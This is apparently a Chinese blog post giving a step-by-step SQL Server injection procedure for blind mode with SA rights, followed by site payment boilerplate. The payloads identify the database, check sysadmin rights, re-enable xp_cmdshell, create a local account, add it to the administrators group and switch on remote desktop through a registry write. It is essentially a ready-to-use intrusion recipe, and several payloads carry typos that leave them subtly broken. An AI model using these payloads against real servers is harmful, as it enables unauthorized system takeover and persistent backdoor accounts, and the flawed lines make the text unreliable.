MSSQL注入SA权限不显错模式下的入侵

第一步判断是不是微软的sqlserver 数据库
and exists (select * from %20 sysobjects )
第二步查询当前数据库系统用户
and system_user=0
第三步检查权限是否为SA
and 1 =(slect IS_SRVROLEMEMBER(‘sysadmin’))
第四步判断一下xp_cmdshell 存储过程是否存在
and 1=(select count (*) from master.dbo.sysobjects where name = ‘xp_cmdshell’)
xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。
默认不存在恢复xp_cmdshell
EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;–
第五步执行xp_cmdshell 扩展存储添加账号
;exec master…xp_cmdshell ‘net user test test /add’
把添加的账号添加到管理员组
;exec master…xp_cmdshell ‘net localgroup administrator test /add’
开启远程3389
;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值